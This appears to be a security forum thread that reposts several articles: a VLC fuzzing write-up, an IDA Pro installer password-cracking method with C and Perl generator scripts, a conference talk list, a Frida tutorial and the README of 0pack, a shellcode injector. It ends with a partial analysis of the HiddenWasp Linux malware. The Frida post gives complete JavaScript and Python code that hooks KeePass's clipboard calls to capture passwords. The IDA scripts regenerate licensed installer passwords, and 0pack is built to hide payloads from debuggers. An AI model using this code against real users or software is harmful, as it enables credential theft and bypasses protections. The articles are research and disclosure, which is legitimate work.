'/home/symeon/Pictures/Screenshot from 2019-03-24 11-47-04.png' Figure 15: Adding attachments to an existing mkv file. Brilliant, this looks like it worked! Finally let’s confirm it by setting up a breakpoint on the relevant code, and run VLC with the new sample: Figure 16: Hitting our breakpoint and expanding our coverage! Excellent! We’ve managed to successfully create a new attachment and hit new functions within the mkv::matroska_segment codebase! Our next step would be similar to this technique, adjust the samples and freshly fuzz our target! Discovered vulnerabilities After running our fuzzing project for two weeks, as you can see from the following screenshot we performed a total 1 million executions (!), resulting in 1547 crashes of which 36 were unique. Figure 17: A unique 36 crashes after fuzzing VLC for 15 days! Figure 18: A double free vulnerability while parsing a malformed mkv file. Many crashes were divisions by zero, and null pointer dereferences. A few heap based out-of-bounds write were also discovered which were not able to reproduce reliably. However, the following five vulnerabilities were disclosed to the security team of VLC. 1. Double Free in mkv::mkv_track_t::~mkv_track_t() ==79009==ERROR: AddressSanitizer: attempting double-free on 0x602000048e50 in thread T5: mkv demux error: Couldn't allocate buffer to inflate data, ignore track 4 [000061100006a080] mkv demux error: Couldn't handle the track 4 compression #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 #1 0x7fb7722c3b6f in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:895:5 #2 0x7fb77214ad4b in mkv::matroska_segment_c::ParseTrackEntry(libmatroska::KaxTrackEntry const*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:992:13 The above vulnerability was fixed with the release of VLC 3.0.7 based on the following commit: http://git.videolan.org/?p=vlc.git;a=commit;h=81023659c7de5ac2637b4a879195efef50846102. 2. Freeing on address which was not malloced in es_format_Clean. [000061100005ff40] mkv demux error: cannot load some cues/chapters/tags etc. (broken seekhead or file) [000061100005ff40] ================================================================= ==92463==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x02d000000000 in thread T5 mkv demux error: cannot use the segment #0 0x4ac420 in __interceptor_free /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cc:123:3 #1 0x7f7470232230 in es_format_Clean /home/symeon/Desktop/vlc/src/misc/es_format.c:496:9 #2 0x7f7452f82a6c in mkv::mkv_track_t::~mkv_track_t() /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:892:5 #3 0x7f7452dd78e4 in std::default_delete<mkv::mkv_track_t>::operator()(mkv::mkv_track_t*) const /usr/lib/gcc/x86_64-linux-gnu/8/../../../../include/c++/8/bits/unique_ptr.h:81:2 3. Heap Out Of Bounds Read in mkv::demux_sys_t::FreeUnused() libva error: va_getDriverName() failed with unknown libva error,driver_name=(null) [00006060001d1860] decdev_vaapi_drm generic error: vaInitialize: unknown libva error [h264 @ 0x6190000a4680] top block unavailable for requested intra mode -1 [h264 @ 0x6190000a4680] error while decoding MB 10 0, bytestream 71 ================================================================= ==104180==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500082c24f at pc 0x0000004ab6da bp 0x7f6f5ac3faf0 sp 0x7f6f5ac3f2a0 READ of size 128 at 0x62500082c24f thread T8 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7f6f5ad1748f in lavc_CopyPicture /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:435:13 #2 0x7f6f5ad13b89 in DecodeBlock /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1259:17 #3 0x7f6f5ad0e537 in DecodeVideo /home/symeon/Desktop/vlc/modules/codec/avcodec/video.c:1356:12 4. Heap Out Of Bounds Read in mkv::demux_sys_t::FreeUnused() [0000611000069f40] mkv demux error: No tracks supported ================================================================= ==81972==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000482c0 at pc 0x7f0a692c7a37 bp 0x7f0a6bf2ac10 sp 0x7f0a6bf2ac08 READ of size 8 at 0x6020000482c0 thread T7 #0 0x7f0a692c7a36 in mkv::demux_sys_t::FreeUnused() /home/symeon/Desktop/vlc/modules/demux/mkv/demux.cpp:267:34 #1 0x7f0a6937eaf1 in mkv::Open(vlc_object_t*) /home/symeon/Desktop/vlc/modules/demux/mkv/mkv.cpp:257:12 #2 0x7f0a86792691 in demux_Probe /home/symeon/Desktop/vlc/src/input/demux.c:180:15 #3 0x7f0a866d8d17 in module_load /home/symeon/Desktop/vlc/src/modules/modules.c:122:15 5. Heap Out Of Bounds Read in mkv::matroska_segment_c::TrackInit ================================================================= ==83326==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000b3134 at pc 0x0000004ab6da bp 0x7ffb4f076250 sp 0x7ffb4f075a00 READ of size 13104 at 0x6040000b3134 thread T7 #0 0x4ab6d9 in __asan_memcpy /home/symeon/Desktop/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:22:3 #1 0x7ffb4d84008d in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_handler(char const*&, mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::HandlerPayload&) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1807:25 #2 0x7ffb4d83f6ab in mkv::matroska_segment_c::TrackInit(mkv::mkv_track_t*)::TrackCodecHandlers::StringProcessor_1783_callback(char const*, void*) /home/symeon/Desktop/vlc/modules/demux/mkv/matroska_segment_parse.cpp:1783:9 #3 0x7ffb4d7dc486 in (anonymous namespace)::StringDispatcher::send(char const* const&, void* const&) const /home/symeon/Desktop/vlc/modules/demux/mkv/string_dispatcher.hpp:128:13 Note: Some of those bugs were also previously discovered and disclosed via the HackerOne Bug Bounty, and the rest of the bugs have not been addressed as of now. Advanced fuzzing with libFuzz While searching for previous techniques, I stumbled upon this blog post, where one of the VLC developers used libFuzz to get deeper coverage. The developer used for example the vlc_stream_MemoryNew() (https://www.videolan.org/developers/vlc/doc/doxygen/html/stream__memory_8c.html)which reads data from the byte stream and fuzzed the demux process. As expected, he manged to find a few interesting vulnerabilities. This proves that the more effort you do to write your own harness and research your target, the better results (and bugs) you will get! Takeaways We started with zero knowledge of how VLC works, and we’ve learnt how to create a very simple harness based on the documentation (which was unsuccessful). We nevertheless continued with instrumenting VLC with honggfuzz, and although the standard process of instrumenting the binary didn’t work (hfuzz-clang), we were able to tweak a bit the parameters and successfully instrument the binary. We continued by gathering samples, compiled and linked VLC against the libhfuzz library adding coverage support, started the fuzzing process, got crashes and triaged our crashes! We were then able to measure our initial coverage and improve our samples increasing the overall coverage. Targeting only the .mkv format we saw that we were able to get a total of 50% coverage of the mkv file format. Remember that VLC supports a number of different video and audio file formats – sure enough there is still a lot of code that can be fuzzed! Finally, although we used a relatively fast VM for this project, it should be noted that even a slow 4GB VM can be used and give you bugs! Acknowledgements This blog post would not be possible without guidance from @robertswiecki, helping with the compilation and linkage process, as well as all giving me the tips and tricks described above in this guide. Finally, thanks @AlanMonie and @Yekki_1 for helping me with the fuzzing VM. VideoLAN have issued an advisory Sursa: https://www.pentestpartners.com/security-blog/double-free-rce-in-vlc-a-honggfuzz-how-to/
  7. Tech Editorials Operation Crack: Hacking IDA Pro Installer PRNG from an Unusual Way Advisory By Shaolin on 2019-06-21 English Version 中文版本 Introduction Today, we are going to talk about the installation password of Hex-Rays IDA Pro, which is the most famous decompiler. What is installation password? Generally, customers receive a custom installer and installation password after they purchase IDA Pro. The installation password is required during installation process. However, if someday we find a leaked IDA Pro installer, is it still possible to install without an installation password? This is an interesting topic. After brainstorming with our team members, we verified the answer: Yes! With a Linux or MacOS version installer, we can easily find the password directly. With a Windows version installer, we only need 10 minutes to calculate the password. The following is the detailed process: * Linux and MacOS version The first challenge is Linux and MacOS version. The installer is built with an installer creation tool called InstallBuilder. We found the plaintext installation password directly in the program memory of the running IDA Pro installer. Mission complete! This problem is fixed after we reported through Hex-Rays. BitRock released InstallBuilder 19.2.0 with the protection of installation password on 2019/02/11. * Windows version It gets harder on Windows version because the installer is built with Inno Setup, which store its password with 160-bit SHA-1 hash. Therefore, we cannot get the password simply with static or dynamic analyzing the installer, and brute force is apparently not an effective way. But the situation is different if we can grasp the methodology of password generation, which lets us enumerate the password more effectively! Although we have realized we need to find how Hex-Rays generate password, it is still really difficult, as we do not know what language the random number generator is implemented with. There are at least 88 random number generators known. It is such a great variation. We first tried to find the charset used by random number generator. We collected all leaked installation passwords, such as hacking team’s password, which is leaked by WikiLeaks. FgVQyXZY2XFk (link) 7ChFzSbF4aik (link) ZFdLqEM2QMVe (link) 6VYGSyLguBfi (link) From the collected passwords we can summarize the charset: 23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz The missing of 1, I, l, 0, O, o, N, n seems to make sense because they are confusing characters. Next, we guess the possible charset ordering like these: 23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz 23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789 ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789 Lastly, we picked some common languages(c/php/python/perl)to implement a random number generator and enumerate all the combinations. Then we examined whether the collected passwords appears in the combinations. For example, here is a generator written in C language: #include<stdio.h> #include<stdlib.h> char _a[] = "23456789ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz"; char _b[] = "ABCDEFGHJKLMPQRSTUVWXYZ23456789abcdefghijkmpqrstuvwxyz"; char _c[] = "23456789abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ"; char _d[] = "abcdefghijkmpqrstuvwxyz23456789ABCDEFGHJKLMPQRSTUVWXYZ"; char _e[] = "abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789"; char _f[] = "ABCDEFGHJKLMPQRSTUVWXYZabcdefghijkmpqrstuvwxyz23456789"; int main() { char bufa[21]={0}; char bufb[21]={0}; char bufc[21]={0}; char bufd[21]={0}; char bufe[21]={0}; char buff[21]={0}; unsigned int i=0; while(i<0x100000000) { srand(i); for(size_t n=0;n<20;n++) { int key= rand() % 54; bufa[n]=_a[key]; bufb[n]=_b[key]; bufc[n]=_c[key]; bufd[n]=_d[key]; bufe[n]=_e[key]; buff[n]=_f[key]; } printf("%s\n",bufa); printf("%s\n",bufb); printf("%s\n",bufc); printf("%s\n",bufd); printf("%s\n",bufe); printf("%s\n",buff); i=i+1; } } After a month, we finally generated the IDA Pro installation passwords successfully with Perl, and the correct charset ordering is abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789. For example, we can generate the hacking team’s leaked password FgVQyXZY2XFk with the following script: #!/usr/bin/env perl # @_e = split //,"abcdefghijkmpqrstuvwxyzABCDEFGHJKLMPQRSTUVWXYZ23456789"; $i=3326487116; srand($i); $pw=""; for($i=0;$i<12;++$i) { $key = rand 54; $pw = $pw . $_e[$key]; } print "$i $pw\n"; With this, we can build a dictionary of installation password, which effectively increase the efficiency of brute force attack. Generally, we can compute the password of one installer in 10 minutes. We have reported this issue to Hex-Rays, and they promised to harden the installation password immediately. Summary In this article, we discussed the possibility of installing IDA Pro without owning installation password. In the end, we found plaintext password in the program memory of Linux and MacOS version. On the other hand, we determined the password generation methodology of Windows version. Therefore, we can build a dictionary to accelerate brute force attack. Finally, we can get one password at a reasonable time. We really enjoy this process: surmise wisely and prove it with our best. It can broaden our experience no matter the result is correct or not. This is why we took a whole month to verify such a difficult surmise. We also take this attitude in our Red Team Assessment. You would love to give it a try! Lastly, we would like to thank for the friendly and rapid response from Hex-Rays. Although this issue is not included in Security Bug Bounty Program, they still generously awarded us IDA Pro Linux and MAC version, and upgraded the Windows version for us. We really appreciate it. Timeline Jan 31, 2019 - Report to Hex-Rays Feb 01, 2019 - Hex-Rays promised to harden the installation password and reported to BitRock Feb 11, 2019 - BitRock released InstallBuilder 19.2.0 Sursa: https://devco.re/blog/2019/06/21/operation-crack-hacking-IDA-Pro-installer-PRNG-from-an-unusual-way-en/
      • 1
      • Upvote
  8. Nu stiu despre ce e vorba cu acel CTI, eu am scris cate ceva aici, sper sa te ajute:
  9. #HITB2019AMS PRECONF PREVIEW - The End Is The Beginning Is The End: Ten Years In The NL Box Hack In The Box Security Conference #HITB2019AMS PRECONF PREVIEW - The Beginning of the End? A Return to the Abyss for a Quick Look Hack In The Box Security Conference #HITB2019AMS KEYNOTE: The End Is The Beginning Is The End: Ten Years In The NL Box - D. Kannabhiran Hack In The Box Security Conference #HITB2019AMS D1T1 - Make ARM Shellcode Great Again - Saumil Shah Hack In The Box Security Conference #HITB2019AMS D1T2 - Hourglass Fuzz: A Quick Bug Hunting Method - M. Li, T. Han, L. Jiang and L. Wu Hack In The Box Security Conference #HITB2019AMS D1T1 - TOCTOU Attacks Against Secure Boot And BootGuard - Trammell Hudson & Peter Bosch Hack In The Box Security Conference #HITB2019AMS D1T2 - Hidden Agendas: Bypassing GSMA Recommendations On SS7 Networks - Kirill Puzankov Hack In The Box Security Conference #HITB2019AMS D1T1 - Finding Vulnerabilities In iOS/MacOS Networking Code - Kevin Backhouse Hack In The Box Security Conference #HITB2019AMS D1T2 - fn_fuzzy: Fast Multiple Binary Diffing Triage With IDA - Takahiro Haruyama Hack In The Box Security Conference #HITB2019AMS D1T3 - How To Dump, Parse, And Analyze i.MX Flash Memory Chips - Damien Cauquil Hack In The Box Security Conference #HITB2019AMS D1T1 - The Birdman: Hacking Cospas-Sarsat Satellites - Hao Jingli Hack In The Box Security Conference #HITB2019AMS D1T2 - Duplicating Black Box Machine Learning Models - Rewanth Cool and Nikhil Joshi Hack In The Box Security Conference #HITB2019AMS D1T3 - Overcoming Fear: Reversing With Radare2 - Arnau Gamez Montolio Hack In The Box Security Conference #HITB2019AMS D1T1 - Deobfuscate UEFI/BIOS Malware And Virtualized Packers - Alexandre Borges Hack In The Box Security Conference #HITB2019AMS D1T2 - Researching New Attack Interfaces On iOS And OSX - Lilang Wu and Moony Li Hack In The Box Security Conference #HITB2019AMS D1T1 - A Successful Mess Between Hardening And Mitigation - Weichselbaum & Spagnuolo Hack In The Box Security Conference #HITB2019AMS D1T2 - For The Win: The Art Of The Windows Kernel Fuzzing - Guangming Liu Hack In The Box Security Conference #HITB2019AMS D1T3 - Attacking GSM - Alarms, Smart Homes, Smart Watches And More - Alex Kolchanov Hack In The Box Security Conference #HITB2019AMS D1T1 - SeasCoASA: Exploiting A Small Leak In A Great Ship - Kaiyi Xu and Lily Tang Hack In The Box Security Conference #HITB2019AMS D1T2 - H(ack)DMI: Pwning HDMI For Fun And Profit - Jeonghoon Shin and Changhyeon Moon Hack In The Box Security Conference #HITB2019AMS D1T1 - Pwning Centrally-Controlled Smart Homes - Sanghyun Park and Seongjoon Cho Hack In The Box Security Conference #HITB2019AMS D1T2 - Automated Discovery Of Logical Priv. Esc. Bugs In Win10 - Wenxu Wu and Shi Qin Hack In The Box Security Conference Sursa:
      • 1
      • Upvote
  10. Fun With Frida JamesFollow Jun 2 In this post, we’re going to take a quick look at Frida and use it to steel credentials from KeePass. According to their website, Frida is a “dynamic instrumentation framework”. Essentially, it allows us to inject into a running process then interact with that process via JavaScript. It’s commonly used for mobile app testing, but is supported on Windows, OSX and *Nix as well. KeePass is a free and open-source password manager with official builds for Windows, but unofficial releases exist for most Linux flavors. We are going to look at the latest official Windows version 2 release (2.42.1). To follow along, you will need Frida, KeePass and Visual Studio (or any other editor you want to load a .net project in). You will also need the KeePass source from https://keepass.info/download.html The first step is figuring out what we want to achieve. Like most password managers, KeePass protects stored credentials with a master password. This password is entered by the user and allows the KeePass database to be accessed. Once unlocked, usernames and passwords can be copied to the clipboard to allow them to be entered. Given that password managers allow the easy use of strong passwords, it’s a fairly safe assumption that users will be copying and pasting passwords. Lets take at look how KeePass interacts with the clipboard. After a bit of digging (hit: the search tool is your friend), we find some references to the “SetClipboardData” windows API call. It looks like KeePass is hooking the native Windows API to manage the clipboard. Looking at which calls reference this method, we find one reference within the ClipboardUtil.Windows.cs class. It looks like the “SetDataW” method is how KeePass interacts with the clipboard. private static bool SetDataW(uint uFormat, byte[] pbData) { UIntPtr pSize = new UIntPtr((uint)pbData.Length); IntPtr h = NativeMethods.GlobalAlloc(NativeMethods.GHND, pSize); if(h == IntPtr.Zero) { Debug.Assert(false); return false; } Debug.Assert(NativeMethods.GlobalSize(h).ToUInt64() >= (ulong)pbData.Length); // Might be larger IntPtr pMem = NativeMethods.GlobalLock(h); if(pMem == IntPtr.Zero) { Debug.Assert(false); NativeMethods.GlobalFree(h); return false; } Marshal.Copy(pbData, 0, pMem, pbData.Length); NativeMethods.GlobalUnlock(h); // May return false on success if(NativeMethods.SetClipboardData(uFormat, h) == IntPtr.Zero) { Debug.Assert(false); NativeMethods.GlobalFree(h); return false; } return true; } This code uses native method calls to allocate some memory, writes the supplied pbData byte array to that location and then calls the SetClipBoardData API, passing a handle to the memory containing the contents of pbData. To confirm this is the code we want to target, we can add a breakpoint and debug the app. Before we can build the solution, we need to fix up the singing key. The easiest way is just to disable signing for the KeePass and KeePassLib projects (Right click -> Properties -> Signing -> uncheck “Sign the assembly” -> save). With our breakpoint set we can run KeePass, open a database and copy a credential (right click -> copy password). Our breakpoint is hit and we can inspect the value of pbData. If you get a build error, double check you have disabled signing and try again. In this case, the copied password was “AABBCCDD”, which matches the bytes shown. We can confirm this by adding a bit of code to the method and re-running our test. var str = System.Text.Encoding.Default.GetString(pbData); This will convert the pbData byte array to a string, which we can inspect with the debugger. This looks like a good method to target, as the app only calls the SetClipboardData native API in one place (meaning we shouldn’t need to filter out any calls we don’t care about). Time to fire up Frida. Before we get into hooking the KeePass application, we need a way to inject Frida. For this example, we are going to use a simple python3 script. import frida import sys import codecs def on_message(message, data): if message['type'] == 'send': print(message['payload']) elif message['type'] == 'error': print(message['stack']) else: print(message) try: session = frida.attach("KeePass.exe") print ("[+] Process Attached") except Exception as e: print (f"Error => {e}") sys.exit(0) with codecs.open('./Inject.js', 'r', 'utf-8') as f: source = f.read() script = session.create_script(source) script.on('message', on_message) script.load() try: while True: pass except KeyboardInterrupt: session.detach() sys.exit(0) This looks complicated, but doesn’t actually do that much. The interesting part happens inside the try/catch block. We attempt to attach to the “KeePass.exe” process, then inject a .js file containing our code to interact with the process and set up messaging. The “on_message” function allows messages to be received from the target process, which we just print to the console. This code is basically generic, so you can re-use it for any other process you want to target. Our code to interact with the process will be written in the “Inject.js” file. First, we need to grab a reference to the SetClipboardData API. var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData") We can then attach to this call, which sets up our hook. // Attach a hook to the native pointer Interceptor.attach(user32_SetClipboardData, { onEnter: function (args, state) { console.log("[+] KeePass called SetClipboardData"); }, onLeave: function (retval) { } }); The “OnEnter” method is called as the target process calls SetClipboardData. OnLeave, as you might expect, is called just before the hooked method returns. I’ve added a simple console.log call to the OnEnter function, which will let us test our hook and make sure we aren’t getting any erroneous API calls showing up. With KeePass.exe running (you can use the official released binary now, no need to run the debug version from Visual Studio), run the python script. You should see the “process attached” message. Unlock KeePass and copy a credential. You should see the “KeePass called SetClipboardData” message. KeePass, by default, clears the clipboard after 12 seconds. You will see another “KeePass called SetClipboardData” message when this occurs. We can strip that out later. Looking at the SetClipboardData API document, we can see that two parameters are passed. A format value, and a handle. The handle is essentially a pointer to the memory address containing the data to add to the clipboard. For this example, we can safely ignore the format value (this is used to specify the type of data to be added to the clipboard). KeePass uses one of two format values, I’ll leave it as an exercise for the reader to modify the PoC to support both formats fully. The main thing we need to know is that the second argument is the memory address we want to access. In Frida, we gain access to arguments passed to hooked methods via the “args” array. We can then use the Frida API to read data from the address passed to hMem. // Get native pointer to MessageBoxA var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData") // Attach a hook to the native pointer Interceptor.attach(user32_SetClipboardData, { onEnter: function (args, state) { console.log("[+] KeePass called SetClipboardData"); var ptr = args[1].readPointer().readByteArray(32); console.log(ptr) }, onLeave: function (retval) { } }); Here we call readPointer() on args[1], then read a byte array from it. Note that the call to readByteArray() requires a length value, which we don’t have. While it should be possible to grab this from other calls, we can side step this complexity by simply reading a set number of bytes. This may be a slightly naive approach, but it’s sufficient for our purposes. Kill the python script and re-run (you don’t need to re-start KeePass). Copy some data and you should see the byte array written to the console. Frida automatically formats the byte array for us. We can see the password “AABCCDD” being set on the clipboard, followed by “ — “ 12 seconds later. This is the string KeePass uses to overwrite the clipboard data. This is enough information to flesh out our PoC. We can convert the byte array to a string, then check if the string starts with “ — “ to remove the data when KeePass clears the clipboard. Note that is is, again, a fairly naive approach and introduces an obvious bug where a password starting with “ — “ would not be captured. Another exercise for the reader! This gives us our complete PoC. // Get native pointer to MessageBoxA var user32_SetClipboardData = Module.findExportByName("user32.dll", "SetClipboardData") // Attach a hook to the native pointer Interceptor.attach(user32_SetClipboardData, { onEnter: function (args, state) { console.log("[+] KeePass called SetClipboardData"); var ptr = args[1].readPointer().readByteArray(32); var str = ab2str(ptr); if(!str.startsWith("--")){ console.log("[+] Captured Data!") console.log(str); } else{ console.log("[+] Clipboard was cleared") } }, onLeave: function (retval) { } }); function ab2str(buf){ return String.fromCharCode.apply(null, new Uint16Array(buf)); } The ab2str function converts a byte array to a string, the rest should be self explanatory. If we run this PoC we should see the captured password and a message telling us the clipboard was cleared. That’s all for this post. There is obviously some work to do before we could use this on an engagement, but we can see how powerful Frida can be. It’s worth noting that you do not need any privileges to inject into the KeePass process, all the examples were run with KeePass and CMD running as a standard user. James Purveyor of fine, handcrafted, artisanal cybers. Sursa: https://medium.com/@two06/fun-with-frida-5d0f55dd331a
  11. Nytro

    0pack

    0pack Description An ELF x64 binary payload injector written in c++ using the LIEF library. Injects shellcode written in fasm as relocations into the header. Execution begins at entrypoint 0 aka the header, this confuses or downright breaks debuggers. The whole first segment is rwx, this can be mitigated at runtime through an injected payload which sets the binaries segment to just rx. Compiler flags The targeted binary must have following flags: gcc -m64 -fPIE -pie Statically linking is not possible as -pie and -static are incompatible flags. Or in other terms: -static means a statically linked executable with no dynamic > relocations and only PT_LOAD segments. -pie means a shared library with > dynamic relocations and PT_INTERP and PT_DYNAMIC segments. Presentation links HTML: https://luis-hebendanz.github.io/0pack/ PDF: https://github.com/Luis-Hebendanz/0pack/raw/master/0pack-presentation.pdf Video: https://github.com/Luis-Hebendanz/0pack/raw/master/html/showcase_video.webm Debugger behaviour Debuggers don't generally like 0 as the entrypoint and oftentimes it is impossible to set breakpoints at the header area. Another often occured issue is that the entry0 label gets set incorrectly to the main label. Which means the attacker can purposely mislead the reverse engineer into reverse engineering fake code by jumping over the main method. Executing db entry0 in radare2 has this behaviour. Affected debuggers radare2 Hopper gdb IDA Pro --> Not tested 0pack help Injects shellcode as relocations into an ELF binary Usage: 0pack [OPTION...] -d, --debug Enable debugging -i, --input arg Input file path. Required. -p, --payload arg Fasm payload path. -b, --bin_payload arg Binary payload path. -o, --output arg Output file path. Required. -s, --strip Strip the binary. Optional. -b, --bin_payload The bin_payload option reads a binary file and converts it to ELF relocations. 0pack appends to the binary payload a jmp to the original entrypoint. -p, --payload Needs a fasm payload, 0pack prepends and appends a "push/pop all registers" and a jmp to the original entrypoint to the payload. Remarks Altough I used the LIEF library to accomplish this task, I wouldn't encourage to use it. It is very inconsistent and intransparant in what it is doing. Often times the library is downright broken. I did not find a working library for x64 PIE enabled ELF binaries. If someone has suggestions, feel free to email me on: luis.nixos@gmail.com Dependencies cmake version 3.12.2 or higher build-essential gcc fasm Use build script $ ./build.sh Build it manually $ mkdir build $ cd build $ cmake .. $ make $ ./../main.elf Sursa: https://github.com/Luis-Hebendanz/0pack
  12. HiddenWasp Malware Stings Targeted Linux Systems Ignacio Sanmillan 29.05.19 | 1:36 pm Share: Overview • Intezer has discovered a new, sophisticated malware that we have named “HiddenWasp”, targeting Linux systems. • The malware is still active and has a zero-detection rate in all major anti-virus systems. • Unlike common Linux malware, HiddenWasp is not focused on crypto-mining or DDoS activity. It is a trojan purely used for targeted remote control. • Evidence shows in high probability that the malware is used in targeted attacks for victims who are already under the attacker’s control, or have gone through a heavy reconnaissance. • HiddenWasp authors have adopted a large amount of code from various publicly available open-source malware, such as Mirai and the Azazel rootkit. In addition, there are some similarities between this malware and other Chinese malware families, however the attribution is made with low confidence. • We have detailed our recommendations for preventing and responding to this threat. 1. Introduction Although the Linux threat ecosystem is crowded with IoT DDoS botnets and crypto-mining malware, it is not very common to spot trojans or backdoors in the wild. Unlike Windows malware, Linux malware authors do not seem to invest too much effort writing their implants. In an open-source ecosystem there is a high ratio of publicly available code that can be copied and adapted by attackers. In addition, Anti-Virus solutions for Linux tend to not be as resilient as in other platforms. Therefore, threat actors targeting Linux systems are less concerned about implementing excessive evasion techniques since even when reusing extensive amounts of code, threats can relatively manage to stay under the radar. Nevertheless, malware with strong evasion techniques do exist for the Linux platform. There is also a high ratio of publicly available open-source malware that utilize strong evasion techniques and can be easily adapted by attackers. We believe this fact is alarming for the security community since many implants today have very low detection rates, making these threats difficult to detect and respond to. We have discovered further undetected Linux malware that appear to be enforcing advanced evasion techniques with the use of rootkits to leverage trojan-based implants. In this blog we will present a technical analysis of each of the different components that this new malware, HiddenWasp, is composed of. We will also highlight interesting code-reuse connections that we have observed to several open-source malware. The following images are screenshots from VirusTotal of the newer undetected malware samples discovered: 2. Technical Analysis When we came across these samples we noticed that the majority of their code was unique: Similar to the recent Winnti Linux variants reported by Chronicle, the infrastructure of this malware is composed of a user-mode rootkit, a trojan and an initial deployment script. We will cover each of the three components in this post, analyzing them and their interactions with one another. 2.1 Initial Deployment Script: When we spotted these undetected files in VirusTotal it seemed that among the uploaded artifacts there was a bash script along with a trojan implant binary. We observed that these files were uploaded to VirusTotal using a path containing the name of a Chinese-based forensics company known as Shen Zhou Wang Yun Information Technology Co., Ltd. Furthermore, the malware implants seem to be hosted in servers from a physical server hosting company known as ThinkDream located in Hong Kong. Among the uploaded files, we observed that one of the files was a bash script meant to deploy the malware itself into a given compromised system, although it appears to be for testing purposes: Thanks to this file we were able to download further artifacts not present in VirusTotal related to this campaign. This script will start by defining a set of variables that would be used throughout the script. Among these variables we can spot the credentials of a user named ‘sftp’, including its hardcoded password. This user seems to be created as a means to provide initial persistence to the compromised system: Furthermore, after the system’s user account has been created, the script proceeds to clean the system as a means to update older variants if the system was already compromised: The script will then proceed to download a tar compressed archive from a download server according to the architecture of the compromised system. This tarball will contain all of the components from the malware, containing the rootkit, the trojan and an initial deployment script: After malware components have been installed, the script will then proceed to execute the trojan: We can see that the main trojan binary is executed, the rootkit is added to LD_PRELOAD path and another series of environment variables are set such as the ‘I_AM_HIDDEN’. We will cover throughout this post what the role of this environment variable is. To finalize, the script attempts to install reboot persistence for the trojan binary by adding it to /etc/rc.local. Within this script we were able to observe that the main implants were downloaded in the form of tarballs. As previously mentioned, each tarball contains the main trojan, the rootkit and a deployment script for x86 and x86_64 builds accordingly. The deployment script has interesting insights of further features that the malware implements, such as the introduction of a new environment variable ‘HIDE_THIS_SHELL’: We found some of the environment variables used in a open-source rootkit known as Azazel. It seems that this actor changed the default environment variable from Azazel, that one being HIDE_THIS_SHELL for I_AM_HIDDEN. We have based this conclusion on the fact that the environment variable HIDE_THIS_SHELL was not used throughout the rest of the components of the malware and it seems to be residual remains from Azazel original code. The majority of the code from the rootkit implants involved in this malware infrastructure are noticeably different from the original Azazel project. Winnti Linux variants are also known to have reused code from this open-source project. 2.2 The Rootkit: The rootkit is a user-space based rootkit enforced via LD_PRELOAD linux mechanism. It is delivered in the form of an ET_DYN stripped ELF binary. This shared object has an DT_INIT dynamic entry. The value held by this entry is an address that will be executed once the shared object gets loaded by a given process: Within this function we can see that eventually control flow falls into a function in charge to resolve a set of dynamic imports, which are the functions it will later hook, alongside with decoding a series of strings needed for the rootkit operations. We can see that for each string it allocates a new dynamic buffer, it copies the string to it to then decode it. It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit. When we wrote the script to simulate the cipher that implements the string decoding function we observed the following algorithm: We recognized that a similar algorithm to the one above was used in the past by Mirai, implying that authors behind this rootkit may have ported and modified some code from Mirai. After the rootkit main object has been loaded into the address space of a given process and has decrypted its strings, it will export the functions that are intended to be hooked. We can see these exports to be the following: For every given export, the rootkit will hook and implement a specific operation accordingly, although they all have a similar layout. Before the original hooked function is called, it is checked whether the environment variable ‘I_AM_HIDDEN’ is set: We can see an example of how the rootkit hooks the function fopen in the following screenshot: We have observed that after checking whether the ‘I_AM_HIDDEN’ environment variable is set, it then runs a function to hide all the rootkits’ and trojans’ artifacts. In addition, specifically to the fopen function it will also check whether the file to open is ‘/proc/net/tcp’ and if it is it will attempt to hide the malware’s connection to the cnc by scanning every entry for the destination or source ports used to communicate with the cnc, in this case 61061. This is also the default port in Azazel rootkit. The rootkit primarily implements artifact hiding mechanisms as well as tcp connection hiding as previously mentioned. Overall functionality of the rootkit can be illustrated in the following diagram: 2.3 The Trojan: The trojan comes in the form of a statically linked ELF binary linked with stdlibc++. We noticed that the trojan has code connections with ChinaZ’s Elknot implant in regards to some common MD5 implementation in one of the statically linked libraries it was linked with: In addition, we also see a high rate of shared strings with other known ChinaZ malware, reinforcing the possibility that actors behind HiddenWasp may have integrated and modified some MD5 implementation from Elknot that could have been shared in Chinese hacking forums: When we analyze the main we noticed that the first action the trojan takes is to retrieve its configuration: The malware configuration is appended at the end of the file and has the following structure: 